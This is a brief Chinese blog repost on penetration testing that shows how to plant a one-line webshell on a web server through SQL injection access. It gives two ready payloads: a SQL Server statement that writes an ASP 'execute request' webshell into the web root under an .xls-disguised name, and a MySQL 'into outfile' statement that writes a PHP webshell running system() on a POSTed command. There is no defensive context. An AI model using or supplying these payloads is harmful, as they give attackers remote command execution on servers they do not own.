渗透之——SQL语句生成一句话
程序员文章站
2022-07-12 15:30:35
...
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85296880
1、SQLServer执行SQL语句生成一句话
select '<%execute request("a")%>' into [NB_master] in 'd:\wwwroot\x.asp;a.xls''excel 8.0;' from NB_master;NB_master必须是已经存在的表
2、MySQL执行SQL语句生成一句话
select "<?php @system($_POST["cmd"]);?>" into outfile "/home/webaccount/projectname/www/*.php";
上一篇: 语法错误 : 缺少“;”(在“类型”的前面)的解决方案
下一篇: C++面向对象知识点十二:多态